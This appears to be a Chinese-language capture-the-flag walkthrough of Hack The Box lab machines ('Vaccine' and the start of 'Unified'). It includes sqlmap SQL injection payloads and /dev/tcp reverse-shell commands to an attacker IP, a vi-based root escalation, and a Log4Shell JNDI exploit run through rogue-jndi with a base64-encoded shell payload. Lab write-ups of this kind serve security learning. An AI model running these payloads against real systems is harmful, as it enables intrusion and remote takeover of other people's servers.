[04:00:41] [INFO] GET parameter 'search' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
[04:00:41] [INFO] testing 'PostgreSQL inline queries'
[04:00:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[04:00:41] [WARNING] time-based comparison requires larger statistical model, please wait..... (done)
[04:00:51] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
[04:00:51] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[04:01:01] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable
[04:01:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 34 HTTP(s) requests:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=any query' AND (SELECT (CASE WHEN (6152=6152) THEN NULL ELSE CAST((CHR(69)||CHR(68)||CHR(79)||CHR(71)) AS NUMERIC) END)) IS NULL-- XHCU

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=any query' AND 7041=CAST((CHR(113)||CHR(98)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (7041=7041) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(120)||CHR(122)||CHR(113)) AS NUMERIC)-- PNrW

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=any query';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=any query' AND 1699=(SELECT 1699 FROM PG_SLEEP(5))-- mmIq
---
[04:01:04] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.10 or 19.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[04:01:04] [INFO] fetched data logged to text files under '/home/i3eg1nner/.local/share/sqlmap/output/10.129.112.231'

[*] ending @ 04:01:04 /2023-06-05/

GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? 这句话表明了此处确实存在 sql 注入漏洞。使用–os-shell 参数来判断是否存在命令注入。

sql 命令注入

┌──(i3eg1nner㉿minilite)-[~]
└─$ sqlmap -u 'http://10.129.112.231/dashboard.php?search=any+query' --cookie="PHPSESSID=sg30eek98th94d529cq6u1e1jk" --os-shell
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.7.2#stable}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:02:17 /2023-06-05/

[04:02:17] [INFO] resuming back-end DBMS 'postgresql'
[04:02:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=any query' AND (SELECT (CASE WHEN (6152=6152) THEN NULL ELSE CAST((CHR(69)||CHR(68)||CHR(79)||CHR(71)) AS NUMERIC) END)) IS NULL-- XHCU

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=any query' AND 7041=CAST((CHR(113)||CHR(98)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (7041=7041) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(120)||CHR(122)||CHR(113)) AS NUMERIC)-- PNrW

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=any query';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=any query' AND 1699=(SELECT 1699 FROM PG_SLEEP(5))-- mmIq
---
[04:02:17] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[04:02:17] [INFO] fingerprinting the back-end DBMS operating system
[04:02:17] [INFO] the back-end DBMS operating system is Linux
[04:02:17] [INFO] testing if current user is DBA
[04:02:17] [INFO] retrieved: '1'
[04:02:17] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[04:02:17] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> bash -c "bash -i >& /dev/tcp/10.10.14.109/443 0>&1"
do you want to retrieve the command standard output? [Y/n/a] y
[04:05:12] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[04:06:42] [CRITICAL] connection timed out to the target URL

借助于命令注入，我们使用代码来反弹 shell

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nc -lvnp 443
[sudo] password for i3eg1nner:
listening on [any] 443 ...
connect to [10.10.14.109] from (UNKNOWN) [10.129.112.231] 37922
bash: cannot set terminal process group (1797): Inappropriate ioctl for device
bash: no job control in this shell
postgres@vaccine:/var/lib/postgresql/11/main$ whoami
whoami
postgres
postgres@vaccine:/var/lib/postgresql/11/main$ pwd
pwd
/var/lib/postgresql/11/main
postgres@vaccine:/var/lib/postgresql/11/main$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:f6:4f brd ff:ff:ff:ff:ff:ff
    inet 10.129.112.231/16 brd 10.129.255.255 scope global dynamic ens160
       valid_lft 2215sec preferred_lft 2215sec
    inet6 dead:beef::250:56ff:feb9:f64f/64 scope global dynamic mngtmpaddr
       valid_lft 86396sec preferred_lft 14396sec
    inet6 fe80::250:56ff:feb9:f64f/64 scope link
       valid_lft forever preferred_lft forever
postgres@vaccine:/var/lib/postgresql/11/main$ sudo -l
sudo -l
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
sudo: a password is required
postgres@vaccine:/var/lib/postgresql/11/main$ which python
which python
postgres@vaccine:/var/lib/postgresql/11/main$ which python3
which python3
/usr/bin/python3
postgres@vaccine:/var/lib/postgresql/11/main$ python3 -c "import pty;pty.spawn('/bin/bash')"
<ain$ python3 -c "import pty;pty.spawn('/bin/bash')"
postgres@vaccine:/var/lib/postgresql/11/main$ sudo -l
sudo -l
[sudo] password for postgres:

Sorry, try again.
[sudo] password for postgres:

Sorry, try again.
[sudo] password for postgres:

sudo: 3 incorrect password attempts

getshell 后的信息收集

基础的信息收集得到了 user.txt

postgres@vaccine:/var/lib/postgresql/11/main$ cd ..
cd ..
postgres@vaccine:/var/lib/postgresql/11$ ls
ls
main
postgres@vaccine:/var/lib/postgresql/11$ cd ..
cd ..
postgres@vaccine:/var/lib/postgresql$ ls
ls
11
user.txt
postgres@vaccine:/var/lib/postgresql$ cat user.txt
cat user.txt
ec9b13ca4d6229cd5cc1e09980965bf7

我们同时还在 /var/ www/html目录下其中的 dashboard.php 中找到了密码

session_start(); if($_SESSION['login'] !== "true") { header("Location: index.php"); die(); } try { $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!"); }

虽然是数据库的密码，但存在密码复用的可能，加上本身这个用户就是 postgres，因此在 sudo -l 中输入这个密码试试。

postgres@vaccine:/var/lib/postgresql$ sudo -l
sudo -l
[sudo] password for postgres: P@s5w0rd!

Matching Defaults entries for postgres on vaccine:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR
    XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    mail_badpass

User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
postgres@vaccine:/var/lib/postgresql$ sudo vi -c ':!/bin/sh' /dev/null
sudo vi -c ':!/bin/sh' /dev/null
Sorry, user postgres is not allowed to execute '/usr/bin/vi -c :!/bin/sh /dev/null' as root on vaccine.

vi 提权获取shell

发现了用户可以使用 vi 命令，通过 gtfobins 找到了一个命令，尝试使用但是并不成功，看起来是只能通过 vi 命令来编辑这个 conf 文件，那我们就是用 gtfobins 中生成 shell 的方法来进行

vi
:set shell=/bin/sh
:shell

成功

:shell
# whoami
whoami
root
# cat /root/root.txt
cat /root/root.txt

Unified

信息收集

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.129.227.191
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-05 05:14 EDT
Warning: 10.129.227.191 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.227.191
Host is up (0.13s latency).
Not shown: 64714 closed tcp ports (reset), 815 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
6789/tcp open  ibm-db2-admin
8080/tcp open  http-proxy
8443/tcp open  https-alt
8843/tcp open  unknown
8880/tcp open  cddbp-alt

Nmap done: 1 IP address (1 host up) scanned in 28.88 seconds

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap -sT -sV -sC -p22,6789,8080,8443,8843,8880 10.129.227.191
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-05 05:15 EDT
Nmap scan report for 10.129.227.191
Host is up (0.0041s latency).

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
6789/tcp open  ibm-db2-admin?
8080/tcp open  http-proxy
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Did not follow redirect to https://10.129.227.191:8443/manage
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 431
|     Date: Mon, 05 Jun 2023 09:15:12 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 404
|     Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {                          font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404
|     Found</h1></body></html>
|   GetRequest, HTTPOptions:
|     HTTP/1.1 302
|     Location: http://localhost:8080/manage
|     Content-Length: 0
|     Date: Mon, 05 Jun 2023 09:15:12 GMT
|     Connection: close
|   RTSPRequest, Socks5:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Mon, 05 Jun 2023 09:15:12 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p                           {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_    Request</h1></body></html>
8443/tcp open  ssl/nagios-nsca Nagios NSCA
| http-title: UniFi Network
|_Requested resource was /manage/account/login?redirect=%2Fmanage
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
| Not valid before: 2021-12-30T21:37:24
|_Not valid after:  2024-04-03T21:37:24
8843/tcp open  ssl/unknown
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
| Not valid before: 2021-12-30T21:37:24
|_Not valid after:  2024-04-03T21:37:24
| fingerprint-strings:
|   GetRequest, HTTPOptions, RTSPRequest:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Mon, 05 Jun 2023 09:15:29 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p                           {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_    Request</h1></body></html>
8880/tcp open  cddbp-alt?
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 431
|     Date: Mon, 05 Jun 2023 09:15:12 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 404
|     Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {                          font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404
|     Found</h1></body></html>
|   GetRequest:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Mon, 05 Jun 2023 09:15:12 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p                           {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|     Request</h1></body></html>
|   HTTPOptions:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Mon, 05 Jun 2023 09:15:17 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p                           {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_    Request</h1></body></html>
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8080-TCP:V=7.93%I=7%D=6/5%Time=647DA79F%P=x86_64-pc-linux-gnu%r(Get
SF:Request,84,"HTTP/1\.1\x20302\x20\r\nLocation:\x20http://localhost:8080/
SF:manage\r\nContent-Length:\x200\r\nDate:\x20Mon,\x2005\x20Jun\x202023\x2
SF:009:15:12\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(HTTPOptions,84,"HT
SF:TP/1\.1\x20302\x20\r\nLocation:\x20http://localhost:8080/manage\r\nCont
SF:ent-Length:\x200\r\nDate:\x20Mon,\x2005\x20Jun\x202023\x2009:15:12\x20G
SF:MT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,24E,"HTTP/1\.1\x2040
SF:0\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:\
SF:x20en\r\nContent-Length:\x20435\r\nDate:\x20Mon,\x2005\x20Jun\x202023\x
SF:2009:15:12\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><htm
SF:l\x20lang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20
SF:Bad\x20Request</title><style\x20type=\"text/css\">body\x20{font-family:
SF:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;bac
SF:kground-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:
SF:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{co
SF:lor:black;}\x20\.line\x20{height:1px;background-color:#525D76;border:no
SF:ne;}</style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20B
SF:ad\x20Request</h1></body></html>")%r(FourOhFourRequest,24A,"HTTP/1\.1\x
SF:20404\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Langua
SF:ge:\x20en\r\nContent-Length:\x20431\r\nDate:\x20Mon,\x2005\x20Jun\x2020
SF:23\x2009:15:12\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html>
SF:<html\x20lang=\"en\"><head><title>HTTP\x20Status\x20404\x20\xe2\x80\x93
SF:\x20Not\x20Found</title><style\x20type=\"text/css\">body\x20{font-famil
SF:y:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;b
SF:ackground-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-siz
SF:e:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{
SF:color:black;}\x20\.line\x20{height:1px;background-color:#525D76;border:
SF:none;}</style></head><body><h1>HTTP\x20Status\x20404\x20\xe2\x80\x93\x2
SF:0Not\x20Found</h1></body></html>")%r(Socks5,24E,"HTTP/1\.1\x20400\x20\r
SF:\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:\x20en\r
SF:\nContent-Length:\x20435\r\nDate:\x20Mon,\x2005\x20Jun\x202023\x2009:15
SF::12\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><html\x20la
SF:ng=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20
SF:Request</title><style\x20type=\"text/css\">body\x20{font-family:Tahoma,
SF:Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;background
SF:-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px;}\
SF:x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:bla
SF:ck;}\x20\.line\x20{height:1px;background-color:#525D76;border:none;}</s
SF:tyle></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20R
SF:equest</h1></body></html>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8843-TCP:V=7.93%T=SSL%I=7%D=6/5%Time=647DA7B0%P=x86_64-pc-linux-gnu
SF:%r(GetRequest,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;c
SF:harset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\r\nDa
SF:te:\x20Mon,\x2005\x20Jun\x202023\x2009:15:29\x20GMT\r\nConnection:\x20c
SF:lose\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x2
SF:0Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=
SF:\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h
SF:2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{fon
SF:t-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20
SF:p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;
SF:background-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20
SF:Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>")%r(
SF:HTTPOptions,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;cha
SF:rset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\r\nDate
SF::\x20Mon,\x2005\x20Jun\x202023\x2009:15:29\x20GMT\r\nConnection:\x20clo
SF:se\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20S
SF:tatus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"
SF:text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,
SF:\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{font-
SF:size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\
SF:x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;ba
SF:ckground-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20St
SF:atus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>")%r(RT
SF:SPRequest,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;chars
SF:et=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\r\nDate:\
SF:x20Mon,\x2005\x20Jun\x202023\x2009:15:29\x20GMT\r\nConnection:\x20close
SF:\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Sta
SF:tus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"te
SF:xt/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x
SF:20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{font-si
SF:ze:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x2
SF:0{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;back
SF:ground-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20Stat
SF:us\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8880-TCP:V=7.93%I=7%D=6/5%Time=647DA7A0%P=x86_64-pc-linux-gnu%r(Get
SF:Request,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset
SF:=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\r\nDate:\x2
SF:0Mon,\x2005\x20Jun\x202023\x2009:15:12\x20GMT\r\nConnection:\x20close\r
SF:\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Statu
SF:s\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"text
SF:/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20
SF:h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{font-size
SF::22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{
SF:font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;backgr
SF:ound-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20Status
SF:\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>")%r(FourOh
SF:FourRequest,24A,"HTTP/1\.1\x20404\x20\r\nContent-Type:\x20text/html;cha
SF:rset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20431\r\nDate
SF::\x20Mon,\x2005\x20Jun\x202023\x2009:15:12\x20GMT\r\nConnection:\x20clo
SF:se\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20S
SF:tatus\x20404\x20\xe2\x80\x93\x20Not\x20Found</title><style\x20type=\"te
SF:xt/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x
SF:20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{font-si
SF:ze:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x2
SF:0{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;back
SF:ground-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20Stat
SF:us\x20404\x20\xe2\x80\x93\x20Not\x20Found</h1></body></html>")%r(HTTPOp
SF:tions,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset=u
SF:tf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\r\nDate:\x20M
SF:on,\x2005\x20Jun\x202023\x2009:15:17\x20GMT\r\nConnection:\x20close\r\n
SF:\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Status\
SF:x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"text/c
SF:ss\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3
SF:,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{font-size:2
SF:2px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{fo
SF:nt-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;backgrou
SF:nd-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20Status\x
SF:20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.46 seconds

8080 端口的代理似乎是重定向到了 8443 端口

搜索一下，发现存在漏洞信息

尝试使用第一个工具直接操作，但是不成功，尝试第二个教程中的操作，也并没有反弹。使用 Burp Suite 才成功

下面具体讲述一下操作。首先是要验证这个漏洞存在，在 burp 界面中的提交 json 中的 remember 字段中使用引号将 ${jndi:ldap://{Tun0 IP Address}/whatever} 作为字符串，Response 中得到的是错误信息，这并不足以验证漏洞存在，我们还需要在攻击机上使用 tcpdump 来捕获 389 端口的流量（ldap 协议使用的是 389 端口）

┌──(karti㉿kali-ctf)-[~]  
└─$ sudo tcpdump -i tun0 port 389  
[sudo] password for karti:  
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode  
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes  
07:27:34.587217 IP 10.129.96.149.53060 > kali-ctf.ldap: Flags [S], seq 4162792509, win 64240, options [mss 1285,sackOK,TS val 1408506213 ecr 0,nop,wscale 7], length 0  
07:27:34.587236 IP kali-ctf.ldap > 10.129.96.149.53060: Flags [R.], seq 0, ack 4162792510, win 0, length 0

构建恶意服务器

这样就能帮我们确定这个漏洞是存在的，接下来我们需要构建恶意的服务器，当靶机建立连接的时候，命令会从恶意服务器中发送到靶机上。构建恶意服务器

sudo apt-get install openjdk-11-jdk 
sudo apt-get install maven (mvn -v验证版本，Java项目的构建自动化工具)
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi //用于 JNDI 注入攻击的恶意 LDAP 服务器。
mvn package

构建的 jar 文件会放在 rogue-jndi/target/ 文件夹中，我们接下来构造 payload，将其放置在 Rogue-JNDI server 中

┌──(i3eg1nner㉿minilite)-[~]
└─$ echo "bash -c bash -i >&/dev/tcp/10.10.14.109/4444 0>&1" | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMTA5LzQ0NDQgMD4mMQo=

我们使用 base64 来防止出现编码问题，接着将其传递给 Rogue-JNDI

┌──(i3eg1nner㉿minilite)-[~/Downloads/startpoint/Log4jUnifi/utils]
└─$ java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMTA5LzQ0NDQgMD4mMQo=}|{base64,-d}|{bash,-i}" --hostname "10.10.14.109"
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://10.10.14.109:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.109:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.109:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://10.10.14.109:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
Mapping ldap://10.10.14.109:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://10.10.14.109:1389/o=groovy to artsploit.controllers.Groovy
Mapping ldap://10.10.14.109:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://10.10.14.109:1389/o=reference to artsploit.controllers.RemoteReference

开启后，我们同时使用 nc 监听对应端口，之后借助于 burp 软件来捕获登录的 POST 请求，将 ${jndi:ldap://{Your Tun0 IP}:1389/o=tomcat} 写入 remember 中，再发送。攻击机的服务中会提示以下内容

Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload

回过头看 nc 监听的端口，收到了连接

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.109] from (UNKNOWN) [10.129.47.12] 38170
whoami
unifi
which python
which python3
which python2
which ls
/bin/ls
script /dev/null -c bash
Script started, file is /dev/null
unifi@unified:/usr/lib/unifi$

由于没有 python 环境，一下子不是很习惯，看了一眼 WP，使用了 script /dev/null -c bash

getshell 后的信息收集

unifi@unified:/usr/lib/unifi/data/db$ cd ../backup
cd ../backup
unifi@unified:/usr/lib/unifi/data/backup$ ls
ls
6.4.54.unf  autobackup  meta.json
unifi@unified:/usr/lib/unifi/data/backup$ ls -liah
ls -liah
total 24K
43513 drwxr-xr-x 3 unifi unifi 4.0K Jan  2  2022 .
